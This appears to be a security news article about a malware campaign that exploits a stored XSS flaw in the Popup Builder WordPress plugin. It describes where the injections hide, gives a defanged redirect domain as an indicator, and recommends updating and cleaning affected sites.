New Malware Campaign Exploits Stored XSS in Popup Builder < 4.2.3

A recent surge in cyberattacks has been linked to a new malware campaign targeting websites utilizing the Popup Builder WordPress plugin. Initially identified by security expert Marc Montpas in November 2023, the vulnerability is now being exploited at an alarming rate. In just three weeks, over 3,300 websites have fallen victim to this malicious campaign, with the number continuing to rise rapidly. SiteCheck, a remote malware scanner, has flagged over 1,170 sites as infected.

The Modus Operandi

The attackers utilize a known vulnerability within the Popup Builder plugin to inject malicious code. This code is often concealed within the Custom JS or CSS sections of the WordPress admin interface, residing in the wp_postmeta database table.

These injections act as handlers for various Popup Builder events, allowing the attackers to execute malicious actions during different stages of the popup display process.

Detection and Impact

The malware campaign operates from recently registered domains, dating back to February 12th, 2024. Malicious code injections have been detected, with variations including redirects to suspicious URLs, such as “hxxp://ttincoming.traveltraffic[.]cc/?traffic”.

SiteCheck identifies the malware as “?pbuilder_injection.1.x”. However, the full extent of its capabilities and potential damage remains a concern.

Mitigation and Prevention

Website owners are urged to take immediate action to mitigate the risk posed by this campaign. Updating the Popup Builder plugin to the latest version is crucial in preventing further infections. Additionally, thorough website scans at both the client and server levels are recommended to detect and remove any hidden backdoors.

In the event of a compromise, prompt removal of the malicious injection is essential. However, this should be followed by comprehensive cleanup efforts to prevent reinfection.

The Wake-Up Call

This latest malware campaign serves as a stark reminder of the importance of keeping website software up to date. Failure to do so not only exposes websites to vulnerabilities but also poses a significant risk to user data and online security.

Website owners are encouraged to prioritize regular software updates and implement robust security measures to safeguard against emerging threats.

Seeking Assistance

For those grappling with potential infections or seeking guidance on securing their websites, expert assistance is readily available. Experienced analysts are on standby 24/7 to provide support in removing malware and fortifying online defenses.